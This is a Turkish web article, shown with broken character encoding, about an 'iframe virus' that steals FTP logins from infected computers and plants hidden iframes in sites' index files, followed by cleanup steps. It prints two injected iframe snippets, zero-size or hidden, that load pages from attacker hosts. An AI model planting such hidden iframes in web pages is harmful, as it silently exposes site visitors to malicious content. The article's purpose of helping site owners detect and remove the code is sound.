Ä°nternet ortamında gittikçe yaygınlaÅŸan iframe denilen bir virüs sitelerin baÅŸ belası oluyor. Bu virüs hostunuza bulaÅŸabilir. Bu virüs bir çok web sahibinin sorunu olmuÅŸ durumdadır. Virüs hostinge bulaÅŸtığında index.asp, index.php, default.asp gibi ana sayfa düzenine yerleÅŸtirdiÄŸi kodlar sayesinde siteyi yönlendirebilmektedir. Aynı zamanda diÄŸer bütün klasörlerin içinde bulunan index.php, index.html, index.htm, default.asp dosyalarının içine yerleÅŸiyor. Bu virüs cuteftp, Blazeftp, Filezilla vb bazı programların crack yada keygen programlarından bulaÅŸmakta yada daha evvel bulaÅŸan sitelere girilmesinden dolayı antivirüs programı olmayan bilgisayarlara bulaÅŸmaktadır. Program girdiÄŸiniz bütün ftp'lere girmeye baÅŸlar..
Bir çok antivirüs programında henüz tam anlamıyla görüntülenmeyen virüs avast gibi antivirüs programlarında net olarak tespit edilebilmektedir.
Bu virüs bir kere bilgisayarınıza bulaÅŸtıkdan sonra o bilgisayarla hangi sitenin ftp'ini açarsanız açın girdiÄŸiniz ftp bilgilerini kaydederek, sitelere girip index.php , index.html , index.htm , default.asp 'nin içlerine iframe kodu atiyor. Atılan iframe kodları ÅŸu ÅŸekilde olmaktadır.
<--iframe src http://b6l.ru:8080/index.php width 649 height 135 style visibility: hidden>/iframe--> <--iframe src=http://81.95.145.240/logo/index.php style=border:0px solid gray WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no>
Bu adresler deÄŸiÅŸiklik gösterebilir.
Peki Virüs Sizin Bilgisayarınıza BulaÅŸtı ve bunun farkına vardınız ne yapmamız gerekir ?
Sadece ftp bilgilerinizi alabildiÄŸi için hemen dosyalarınızı pc'ye atıp içindeki iframe kodlarını silin ve tekrar ftp'den upload edin. Sonra hiç vakit kaybetmeden kullandığınız cpanel/plesk panelinize girin ve ÅŸifrenizi deÄŸiÅŸtirin.
Bu iÅŸlemleri yaptıktan sonra sakın ftp'den giriÅŸ yapmayın. Çünkü ftp'den giriÅŸ yaptığınızda deÄŸiÅŸtirdiÄŸiniz ÅŸifreyide alarak tekrar dosyalarıza iframe atmaya baÅŸlayacaktır..Bu iÅŸlemleride yaptıktan sonra virüs taraması yaparak bilgisayarınızı temizleyin. virüsün temizlenmediÄŸini düÅŸünüyorsanız bilgisayarınıza format atabilirsiniz..
***
Herhangi bir web sayfanızdan virüs önce bilgisayarınıza sızıyor ve daha sonra FTP benzeri program ile sitenize bulaşıyor. Haliyle bu ÅŸekilde her yere yayılmaya baÅŸlıyor. Virüs bi süre sonra masaüstünüze update.exe diye bi virüs ekleyip pc'ye zarar vermeye baÅŸlıyormuÅŸ.
Çözüm için ne yapabiliriz?Öncelikle bilgisayarınızda dosya bulma menüsünden cd Win.Agent.pz(ntos.exe) bulduÄŸunuzda hemen silin. Daha sonra antitrojan ve antivirüsler ile bilgisayarınızı tarayın. Bu iÅŸlemlerden sonra FTP'yi kullanıp dosyaları kontrol edin.
DiÄŸer bir alternatif olarak;Sitenizde bulunan dosyaları FTP yoluyla bilgisayarınıza indirip belirtilen iframe kodlarının olup olmadığını kontrol kontrol ederek virüs taramasından geçirin. Güvende olduÄŸunuzu hissediyorsanız Daha sonra dosyaları FTP'den tekrar sitenize atın. Yada Cute FTP kullanıyorsanız Ctrl-F kısayılu ile arama menüsünü açarak sitenizte 81.95.145.240 ip numarasını arayın.
Ä°frame virüsünün bulaÅŸtığı dosyalarda yukarıdaki kırmızı olarak yazılmış satırlara benzer kodlar bulunur. Bu kod genelde sayfanın en sonunda olur. Kodu tamamen silip kaydetmeniz yeterli olacaktır. Ama eÄŸer bilgisayarınızda bir antivirüs yoksa birini yükleyip tarama yaptırın...(Bu Yazı Ä°nternetten DerlenmiÅŸtir)
Modüllerimiz
